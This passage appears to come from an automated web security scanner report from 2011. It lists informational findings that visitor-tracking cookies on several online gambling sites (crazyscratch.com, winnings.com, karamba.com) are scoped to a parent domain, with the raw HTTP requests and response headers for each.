Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.111. http://www.info.crazyscratch.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.112. http://www.info.crazyscratch.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.113. http://www.info.crazyscratch.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.114. http://www.info.crazyscratch.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.115. http://www.info.crazyscratch.com/Privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Privacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.116. http://www.info.crazyscratch.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

11.117. http://www.info.crazyscratch.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.118. http://www.info.crazyscratch.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.119. http://www.info.crazyscratch.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

11.120. http://www.info.crazyscratch.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/visit.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_28=EncryptedUniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=info.crazyscratch.com; expires=Fri, 16-May-2031 11:41:36 GMT; path=/
UniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?CSI=28&CUR=GBP&CurrencyCode=GBP&LanguageCode=ENG&&&CorID=&SentDate= HTTP/1.1
Host: www.info.crazyscratch.com
Proxy-Connection: keep-alive
Referer: http://www.crazyscratch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: crazyscratchccode=US; crazyscratcha=; crazyscratchp=; crazyscratchl=ENG; crazyscratchc=GBP; crazyscratchu=http%3A//www.crazyscratch.com/; crazyscratchlang=English

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Set-Cookie: ASP.NET_SessionId=4hx2gq45wfk4h4454gql45vw; path=/; HttpOnly
Set-Cookie: CSI_28=EncryptedUniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=info.crazyscratch.com; expires=Fri, 16-May-2031 11:41:36 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: UniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Vary: Accept-Encoding
Content-Length: 131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

11.121. http://www.info.winnings.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.winnings.com
Path:	/visit.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_21=EncryptedUniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6&AffiliateID=21&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=103122733IP1x10&ProductTypeID=0; domain=info.winnings.com; expires=Fri, 16-May-2031 11:41:16 GMT; path=/
UniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=21&par=103122733IP1x10&CurrencyCode=gbp HTTP/1.1
Host: www.info.winnings.com
Proxy-Connection: keep-alive
Referer: http://www.winnings.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[subdomain]=www; winnings[cc]=US; winnings[sessionId]=103122733; winnings[vid]=540129; __utmz=184824495.1305546069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184824495.1358600567.1305546069.1305546069.1305546069.1; __utmc=184824495; __utmb=184824495.1.10.1305546069

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:16 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Set-Cookie: ASP.NET_SessionId=e0hjummfyxndaxrtiutvr3ma; path=/; HttpOnly
Set-Cookie: CSI_21=EncryptedUniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6&AffiliateID=21&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=103122733IP1x10&ProductTypeID=0; domain=info.winnings.com; expires=Fri, 16-May-2031 11:41:16 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: BO=FM; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: UniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: CSITemp=21; domain=info.winnings.com; path=/
Vary: Accept-Encoding
Content-Length: 131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

11.122. http://www.karamba.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
